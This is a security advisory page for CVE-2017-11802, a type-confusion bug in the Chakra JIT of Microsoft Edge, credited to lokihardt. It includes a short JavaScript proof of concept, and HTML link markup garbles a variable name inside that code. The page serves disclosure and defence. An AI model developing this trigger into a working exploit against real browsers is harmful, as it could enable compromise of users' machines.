Microsoft Edge Chakra JIT Failed RegexHelper::StringReplace Call

2017.10.15
Credit: lokihardt
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2017-11802
CWE: N/A


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags CVE-2017-11802 The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called. The PoC shows that it can result in type confusion. PoC: function main() { let arr = [1.1, 1.1, 1.1, 1.1, 1.1]; function opt(f) { arr[0] = 1.1; arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f)); arr[2] = 1.1; arr[3] = 1.1; } let <a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a> = () => '0'; for (var i = 0; i < 0x1000; i++) opt(<a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a>); opt(() => { arr[0] = {}; return '0'; }); print(arr[1]); } main(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top